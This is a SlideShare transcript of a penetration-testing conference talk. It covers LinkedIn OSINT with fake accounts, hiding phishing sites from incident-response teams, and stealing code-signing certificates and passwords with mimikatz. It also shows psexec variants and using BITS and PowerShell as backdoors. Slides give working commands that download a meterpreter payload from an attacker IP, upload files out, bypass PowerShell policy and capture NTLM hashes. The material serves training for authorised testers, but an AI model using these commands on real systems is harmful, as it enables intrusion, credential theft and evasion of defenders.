SlideShare a Scribd company logo

Dirty Little Secrets They Didn't Teach You In Pentest Class v2

Download as PPTX, PDF
Rob Fuller
Rob Fuller

This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.

Technology
1 of 120
Whoami • Rob Fuller (mubix) – Twitter -> mubix – Blog -> http://www.room362.com – NoVA Hackers • Previous Talks – Dirty Little Secrets – Networking for Penetration Testers – Metasploit Framework/Pro Training for Rapid7 – Deep Magic 101 – Couch to Career in 80 hours
Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – NoVAHackers • Previous Talks – ColdFusion for Pentesters – From LOW to PWNED – Dirty Little Secrets – Attacking Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
Infoz • No philosophical stuff this time – Just digging in and showing neat shit we’ve been doing since last year – Last year’s stuff still applies although was told we were “preaching to the choir”…who still doesn’t do it…maybe on Sundays… – Anway…
Agenda • Putting in the hours on LinkedIn for SE • Giving IR teams a run for their money • Stealing certs • Mimikatz with Metasploit • New Incognito && Netview release • Ditto • 10 ways to PSEXEC • Why doesn’t SYSTEM have proxy settings!?! • Windows is my backdoor (bitsadmin, powershell, wmi ) • WebDAV server via metasploit • Turning your External Pentest into an Internal one • Overview of current DNS Payload options (if time)
The setup… We like to use LinkedIn for OSINT but how can we do it better?
Becoming a LiON • Why? • API is based on YOUR connections • 2nd and 3rd level connections count but are give different access • Creating a fake account • Connecting with Recruiters ++ • Connecting with “Open Networkers”
LinkedIn API • URL: https://developer.linkedin.com • Allows you to query information – Company info – Groups – Name about your 1st & 2nd order connections
Big Ass LinkedIn Network • Meet “John” • John has been busy being awesome on LinkedIn for the last few months
2nd level connections to Obamz
LinkedIn API • Limited by YOUR connections and network reach • API gives you NO info about 3rd order connections • Usually you’ll see more info via the web on 3rd order people • The total number of search results possible for any search will vary depending on the user's account level.
LinkedIn API • An example (Palantir) CG vs. John
LinkedIn API • An example (Pfizer) CG vs. John
LinkedIn API • An example (Bank of America) CG vs. John
More LinkedIn • Turning an email list into validated LinkedIn Contacts/emails • Import them!
More LinkedIn • Get some emails
More LinkedIn • Import them! • Need them in a specific format though. – Ruby to the rescue
More LinkedIn • Get some ruby
More LinkedIn • Get some contacts
More LinkedIn • Import and do your thing
The setup… IR teams F**k up all my hard work preparing phishing attacks
Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
Phishing and F**king with IR Teams • Apache and mod-rewrite is an option RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|load er|email|nikto|miner|python|wget|Wget).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww- perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR] RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside IR RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR] #googlebot RewriteCond %{REMOTE_ADDR} ^88.88. [OR] RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
The setup… I want to find and steal code signing certificates from victims
Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious – Can you steal their wildcard SSL cert?
Stealing Certificates • If you export one, it has to have a password  • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools /certutil.html – Use Mimikatz 
Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def ault-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip--
Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database. certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul t-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip • “u”  Certificate can be used for authentication or signing  • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
Stealing Certificates • Mozilla pk12util.exe • To extract the cert: C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe - n "Verified Publisher LLC's COMODO CA Limited ID" -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh wru.default-1339854577637 -o test2.p12 -W mypassword1 • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
Stealing Certificates Via MimiKatz (list certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘ Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit
Stealing Certificates Via MimiKatz (export certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK mimikatz(commandline) # exit
The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
Mimikatz gives me clear text passwords?
So does WCE!
Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
The setup… Incognito is awesome and I want to show/leverage the new features
New Incognito (find_token) C:>find_token.exe usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
New Incognito (find_token) C:>find_token.exe dc1 [*] Scanning for logged on users... Server Name Username ------------------------------------------------------ dc1 PROJECTMENTORjdoe dc1 PROJECTMENTORjdoe
Release of NETVIEW
Release of NETVIEW C:Documents and SettingsuserDesktop>netview Netviewer Help -------------------------------------------------------------------- -d domain : Specifies a domain to pull a list of hosts from uses current domain if none specified -f filename.txt : Speficies a file to pull a list of hosts from -o filename.txt : Out to file instead of STDOUT
Release of NETVIEW C:Documents and SettingsuserDesktop>netview -d [+] Host: WIN7X64 [*] -d used without domain specifed - using current domain [+] Number of hosts: 3 Enumerating AD Info [+] WIN7X64 - Comment - [+] Host: DC1 [+] WIN7X64 - OS Version - 6.1 Enumerating AD Info Enumerating IP Info [+] DC1 - Comment - [+] WIN7X64 - IPv4 Address - 172.16.10.216 [+] DC1 - OS Version - 6.1 [+] DC1 - Domain Controller Enumerating Share Info Enumerating IP Info [+] WIN7X64 - Share - ADMIN$ Remote Admin [+] DC1 - IPv4 Address - 172.16.10.10 [+] WIN7X64 - Share - C$ Default share [+] WIN7X64 - Share - IPC$ Remote IPC Enumerating Share Info [+] DC1 - Share - ADMIN$ Remote Admin [+] DC1 - Share - C$ Default share Enumerating Session Info [+] DC1 - Share - IPC$ Remote IPC [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 [+] DC1 - Share - NETLOGON Logon server share [+] DC1 - Share - SYSVOL Logon server share Enumerating Logged-on Users Enumerating Session Info [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] DC1 - Logged-on - PROJECTMENTORjdoe
Release of NETVIEW AND IT’S ALREADY ON GITHUB:
The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
this:
Meet ‘DITTO’
He does something really well…
And it’s not just the icon…
Yes, it’s already on Github too
The setup… Who doesn’t want more ways to psexec??!!!
10 ways to PSEXEC
Sysinternal PSEXEC POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Leaves PSEXESVC • Executes binary as user running specified, not as • Have to touch disk if not SYSTEM, so no Proxy present already concerns
Metasploit PSEXEC POSITIVES NEGATIVES • Supports the use of • Some AVs flag service Hashes binary due to injection techniques used within • Rundll32.exe is running
Metasploit PSEXEC-MOF POSITIVES NEGATIVES • Drop a file and • XP and below Windows automatically – (only because Metasploit runs it. (MAGIC!) doesn’t automatically compile MOFs) • ADMIN$ required – (Unless you make code edits)
Metasploit PSEXEC-As-User POSITIVES NEGATIVES • Executes as the current • Some AVs flag service user binary due to injection • No need for passwords techniques used within or hashes • Rundll32.exe is running • Also a great way to bypass UAC.. But more on that later
WMI POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
Powershell POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
RemCom POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • You can add Pass-The- go over Metasploit Hash sessions directly – (open source an all) – portfwd Fu can still be used on a single IP • Runs as SYSTEM
Winexe POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • Supports Pass-The-Hash go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
smbexec POSITIVES NEGATIVES • Open source psexec • Binary • Supports Pass-The-Hash – (but designed with shoveling over Metasploit in mind) http://sourceforge.net/projects/smbexec/
Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
WinRM (‘new’ hotness) POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
Victim: winrm quickconfig –q Attacker: winrm quickconfig -q winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”} Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
Metasploit PSEXEC-WinRM POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns DISCLAIMER: CURRENTLY VAPORWARE!! but…
Build your own pyBear • PySMB supports auth with using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
The setup… UAC sucks… bypassing only takes 2 things…
The setup… If you’re an admin and UAC is stopping you…
Find a network with more than one Windows box…
The setup… Why doesn’t SYSTEM have proxy settings !?!
• If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit) • WINDOWS/EXEC (or any of the other psexec methods we just talked about) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM /MANUAL_PROXY 192.168.5.100:3128 “;” – After your done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only is used if the program uses WinHTTP • XP – proxycfg –p 192.168.92.100:3128 – or – proxycfg –u (pulls it from IE) • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
REGISTRY Poking • HKLMSoftwarePoliciesMicrosoftWindows CurrentVersionInternet Settings • ProxySettingsPerUser [DWORD] • Set to 0 for settings are System Wide • Set to 1 for settgings are Per User
The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses powershell to upload/download import BITS PS C:Userscg>Import-Module BitsTransfer Download files over BITS PS C:Userscg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:UserscgDesktopmeterpdownload443.exe
Windows is my backdoor BITS (How-To) Upload files over BITS PS C:Userscg> Start-BitsTransfer -Source C:UserscgDesktopfile2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -transfertype upload
Windows is my backdoor BITS over Wireshark
Windows is my backdoor • Powershell • OMG Powershell!
Windows is my backdoor • Powershell
Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
Windows is my backdoor • Powershell cool examples • Port Scanner: PS C:> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null 25 is open • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor • Powershell cool examples • Port Sweeper PS C:> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null 10.1.1.5 • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden - File "C:do_neat_ps_shit.ps1"
Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script • powershell -noexit –EncodedCommand [b64enc BLOB]
Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file C:>type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1 Example: meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat' Process 28536 created. meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL... [*] 4.5.6.21:3863 Staging connection for target /vLNL received... --snip-- [*] Patched Communication Timeout at offset 653608... [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
The setup… A webdav server to download files from. Why? Because we can.
MSF WebDAV server
MSF WebDAV server • net use ipdocuments /User:Guest • copy ipdocumentsmyexe.exe myexe.exe • Available on github: • https://github.com/carnal0wnage/Metasploit- Code/blob/master/modules/exploits/webdav_file_server.rb
MSF WebDAV server msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents [*] 192.168.26.1:17870 PROPFIND => 301 (/documents) [*] 192.168.26.1:17870 PROPFIND /documents/ [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/) [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
While we are on the subject… Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box?? I want to access SHARE3 I don’t have SHARE3 Is that it?
nope (if webclient service is started – Vista+ manual start) I want to access SHARE3 I don’t have SHARE3 on SMB I want to access SHARE3 over WebDAV If you are following along at home, windows is always (unless disabled) listening on Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
On-target NBNS Spoofing FakeNetbiosNS FTW!
Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
Now convince/cause someone to connect to a fake share on VICTIM1…
weeeeeeeeeeeeee • *] 50.50.50.50 http_ntlm - Request '/share3/test.png'... • [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000 • NTLMv2 Response Captured from WIN7X86 • DOMAIN: PROJECTMENTOR USER: jadmin • LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled • NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4 b097cd01c77c09ccedbfc55d0000000002001a0070007 2006f006a006500630074006d0065006e0074006f0072 000000000000000000
why 1. Give me SHARE3! 5. OK, you are in my Intranet, AUTHAUTH 4. AUTH! via portpoxy 3. AUTH! And yes, SMB_Relay works 7. kthxbai! just fine if you have a route set up over your 2. Portproxy! meterpreter shell of the 6. AUTOAUTH! connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
Respectfully refrained from any Inside->Out Google images. You’re welcome.
The setup… Are DNS Payloads useful? Let’s talk about our public options
DNS Payloads • Quick talk on currently available DNS payloads • What’s available? – CANVAS DNS Mosdef – DNS Cat (skull security) – Metasploit DNS Payloads
DNS Payloads • Canvas DNS Mosdef – Uses DNS TXT Records • So its UDP and correctly formed? – BUT • Directly connects to the host • Uses TXT records, – I’ve never pentested someone *good* that allowed this
DNS Payloads • Canvas DNS Mosdef
DNS Payloads • DNSCat (Skullsecurity) – http://www.skullsecurity.org/wiki/index.php/Dnscat – Uses recursive DNS requests • So its UDP and correctly formed? – Has a metasploit payload, so can make a msf dnscat binary to run and get shell – Same as dnscat –d domain –exec “cmd.exe” – BUT • But does recursive DNS requests • Never worked for me IRL
DNS Payloads • DNSCat (Skullsecurity)
DNS Payloads • DNSCat (java version) – http://tadek.pietraszek.org/projects/DNScat/ – Comes as java libs – Requires PPP to tunnel anything useful • *nix only?
DNS Payloads • DNSCat (java version)
DNS Payloads • Metasploit DNS – Currently there are no full DNS payloads • Aside from skullsecurity dnscat payload (not in trunk) – There are several payloads that will got fetch ANOTHER payload and exec it for you via DNS • dns_txt_query_exec.rb • dns_query_exec.rb • https://github.com/rapid7/metasploit- framework/pull/173 – Something in the works: http://dev.metasploit.com/redmine/issues/444#note-9
DNS Payloads • Bottom Line – Nothing public that’s usable ATM
Dirty Little Secrets They Didn't Teach You In Pentest Class v2

Recommended

PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 

Recommended

PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
Will Schroeder
 
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOSReady player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
Cody Thomas
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
Julian Catrambone
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
RootedCON
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 

More Related Content

What's hot

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
